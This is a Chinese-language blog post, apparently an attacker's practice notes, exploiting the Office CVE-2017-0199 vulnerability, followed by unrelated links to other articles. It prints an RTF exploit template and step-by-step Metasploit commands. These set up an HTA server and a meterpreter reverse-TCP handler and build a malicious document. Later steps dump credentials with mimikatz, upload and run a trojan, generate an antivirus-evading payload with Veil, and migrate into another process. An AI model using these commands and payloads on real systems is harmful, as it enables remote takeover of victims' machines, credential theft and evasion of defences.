一大早就各种消息弹框,于是就来测试一波

https://github.com/nixawk/metasploit-framework/blob/8ab0b448fdce15999f155dfd7b22479e5f79de3a/modules/exploits/windows/fileformat/ms17_0199_rtf.rb

增加如下文件:/usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0

{\info

{\author CVE-2017-0199}

{\operator CVE-2017-0199}

}

{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}

{

{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101

{\*\objclass Word.Document.8}

{\*\objdata 0105000002000000

090000004f4c45324c696e6b000000000000000000000a0000

d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d

6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000

000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000

0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000

00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

MINISTREAM_DATA

0105000000000000}

{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}

{\*\datastore }

}

use exploit/windows/misc/hta_server

run

[*] Started reverse TCP handler on 192.168.31.122:4444
[*] Using URL: http://0.0.0.0:8080/6gOqrxRSEWc3LB.hta
[*] Local IP: http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

会自动监听端口

其实也可以:

use exploits/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.31.122

set LPORT 4444

run

use exploit/windows/fileformat/ms17_0199

set TARGETURI http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

set FILENAME haha.doc

run

load mimikatz

msv

cd d:\

upload /root/muma.exe

execute -f muma.exe

据测试下来,成功率不是很高。

2.

测试第二波

apt-get install veil-evasion(kali2安装veil会血崩) 生成一个免杀 use 35

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

msf接收多个session

exploit -j  后台监听
set ExitSession false

ps

迁移进程

migrate 4396

ms17_0199样本测试的更多相关文章

  1. 用2263份证件照图片样本测试how-old.net的人脸识别

    上一年也就是这个时候微软根据自己的人脸识别API推出了一个识别照片中人脸年龄和性别的网站--http://how-old.net,小伙伴们各种玩耍,一年后的今天突发"奇想"地想测试 ...

  2. 使用caffemodel模型(由mnist训练)测试单张手写数字样本

    caffe中训练和测试mnist数据集都是批处理,可以反馈识别率,但是看不到单张样本的识别效果,这里使用windows自带的画图工具手写制作0~9的测试数字,然后使用caffemodel模型识别. 1 ...

  3. 字符型图片验证码识别完整过程及Python实现

    字符型图片验证码识别完整过程及Python实现 1   摘要 验证码是目前互联网上非常常见也是非常重要的一个事物,充当着很多系统的 防火墙 功能,但是随时OCR技术的发展,验证码暴露出来的安全问题也越 ...

  4. Mallet 使用说明

    Mallet:自然语言处理工具包 发表于128 天前 ⁄ 技术, 科研 ⁄ 评论数 6 ⁄ 被围观 1006 Views+ MALLET是基于java的自然语言处理工具箱,包括分档得分类.句类.主题模 ...

  5. libsvm参数学习和核函数使用(转载)

    一.参数说明 English libsvm_options: -s svm_type : set type of SVM (default 0) 0 -- C-SVC        1 -- nu-S ...

  6. [小北De编程手记] : Lesson 02 玩转 xUnit.Net 之 基本UnitTest & 数据驱动

    关于<玩转 xUnit.Net>系列文章,我想跟大家分享的不是简单的运行一下测试用例或是介绍一下标签怎么使用(这样的文章网上很多).上一篇<Lesson 01 玩转 xUnit.Ne ...

  7. Libsvm自定义核函数【转】

    1. 使用libsvm工具箱时,可以指定使用工具箱自带的一些核函数(-t参数),主要有: -t kernel_type : set type of kernel function (default 2 ...

  8. ANTLR3完全参考指南读书笔记[08]

    前言 不要让用户被那些“专业术语”吓住! 用心设计的提示和反馈信息是软件设计者的“职业良心”.   内容 1 存在哪些错误? 2 美化错误提示 3 错误恢复策略   1 存在哪些错误? 在DSL语言开 ...

  9. Learning Theory

    Empiricial Risk Minimization 统计学习理论是整个机器学习到框架.试想我们学习的目的是什么呢?当然是为了具备用合理的方式处理问题的能力.统计学习理论要解决的问题就是基于数据找 ...

随机推荐

  1. Linux常用命令及操作(第二弹)

    Ctrl l清屏 Ctrl d关闭终端 Ctrl Alt T打开终端 pwd 查看当前的目录 Shift Ctrl C复制 Shift Ctrl V粘贴 Shift Ctrl N打开新的终端 F11 ...

  2. crossdomain.xml解决跨域问题

    特别提示:本人博客部分有参考网络其他博客,但均是本人亲手编写过并验证通过.如发现博客有错误,请及时提出以免误导其他人,谢谢!欢迎转载,但记得标明文章出处:http://www.cnblogs.com/ ...

  3. Android动态广播的注册与销毁

    一个内部类:BroadcastReceiver的子类,并定义收到广播之后的操作: class LockScreenBroadcastReceiver extends BroadcastReceiver ...

  4. Shell实现交互式登陆一台同时管理多台机器

    最近为了检测公司服务器的硬盘需要开10多台服务器的僚机来检测服务器,可是这10来台都是操作一样的命令,挨个操作下去太麻烦了 然后就想到了交互式登陆 这里需要创建一个Ip文件夹把你的Ip账户密码都放进去 ...

  5. golang gRPC初探

    gRPC使用protocol buffers作为Interface Definition Language (IDL). gRPC的底层信息交互格式也使用的是protocol buffers. 默认情 ...

  6. Pycharm断点调试入门

    断点调试是在开发过程中常用的功能,能清楚看到代码运行的过程,有利于代码问题跟踪.对我这个小白开发来说,还有一个作用是快速熟悉代码,拿到别人写的代码,有时看不太懂或看的很吃力,光这样看很无感,但是通过断 ...

  7. Java Map集合 遍历 五种方式(包含 Lambda 表达式遍历)

    示例代码如下: package com.miracle.luna.lambda; import java.util.HashMap; import java.util.Iterator; import ...

  8. linux常用命令(22)gzip命令

    减少文件大小有两个明显的好处,一是可以减少存储空间,二是通过网络传输文件时,可以减少传输的时间.gzip是在Linux系统中经常使用的一个对文件进行压缩和解压缩的命令,既方便又好用.gzip不仅可以用 ...

  9. gcc编译器创建和使用静态库、动态库

    http://www.cnblogs.com/dyllove98/archive/2013/06/25/3155599.html 目录树结构: test/include/hello.h #ifdef ...

  10. MJRefresh实现请求数据列表不满一页,或者请求数据为空时,不显示footer文字

    最近自己负责的项目测试要求: 列表的数据不满一页的话就自动隐藏下面的“上拉加载更多”或是“到底了,没有更多数据”. 百度了一下,看了一篇博客的介绍实现: http://blog.csdn.net/gx ...